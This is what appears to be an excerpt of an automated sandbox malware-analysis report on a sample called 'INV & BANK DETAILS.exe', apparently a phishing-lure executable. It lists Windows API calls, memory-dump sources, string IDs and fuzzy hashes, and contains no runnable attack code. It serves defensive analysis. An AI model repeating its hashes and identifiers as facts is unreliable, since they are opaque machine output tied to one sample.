                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcscat_wcslen
                                • String ID: -----$SysListView32
                                • API String ID: 4008455318-3975388722
                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                • GetParent.USER32 ref: 00469C98
                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                • GetParent.USER32 ref: 00469CBC
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 2360848162-1403004172
                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                • String ID:
                                • API String ID: 262282135-0
                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow
                                • String ID:
                                • API String ID: 312131281-0
                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                APIs
                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                • String ID:
                                • API String ID: 3771399671-0
                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                • API String ID: 0-1603158881
                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                • DestroyWindow.USER32(?), ref: 00426F50
                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                • String ID: close all$Wu
                                • API String ID: 4174999648-1790509019
                                • Opcode ID: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                • Opcode Fuzzy Hash: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                APIs
                                • CreateMenu.USER32 ref: 00448603
                                • SetMenu.USER32(?,00000000), ref: 00448613
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                • IsMenu.USER32(?), ref: 004486AB
                                • CreatePopupMenu.USER32 ref: 004486B5
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                • DrawMenuBar.USER32 ref: 004486F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                • String ID: 0
                                • API String ID: 161812096-4108050209
                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\INV & BANK DETAILS.exe), ref: 00434057
                                • LoadStringW.USER32(00000000), ref: 00434060
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                • LoadStringW.USER32(00000000), ref: 00434078
                                • _wprintf.LIBCMT ref: 004340A1
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                Strings
                                • C:\Users\user\Desktop\INV & BANK DETAILS.exe, xrefs: 00434040
                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wprintf
                                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\INV & BANK DETAILS.exe
                                • API String ID: 3648134473-4282670291
                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4e56f2396f7e7809e52916909b083b2a88d0aa7af8933ce1416b3d8aceb115a
                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                • Opcode Fuzzy Hash: b4e56f2396f7e7809e52916909b083b2a88d0aa7af8933ce1416b3d8aceb115a
                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                APIs
                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INV & BANK DETAILS.exe,0040F545,C:\Users\user\Desktop\INV & BANK DETAILS.exe,004A90E8,C:\Users\user\Desktop\INV & BANK DETAILS.exe,?,0040F545), ref: 0041013C
                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                • String ID:
                                • API String ID: 978794511-0
                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove$_memcmp
                                • String ID: '$\$h
                                • API String ID: 2205784470-1303700344
                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
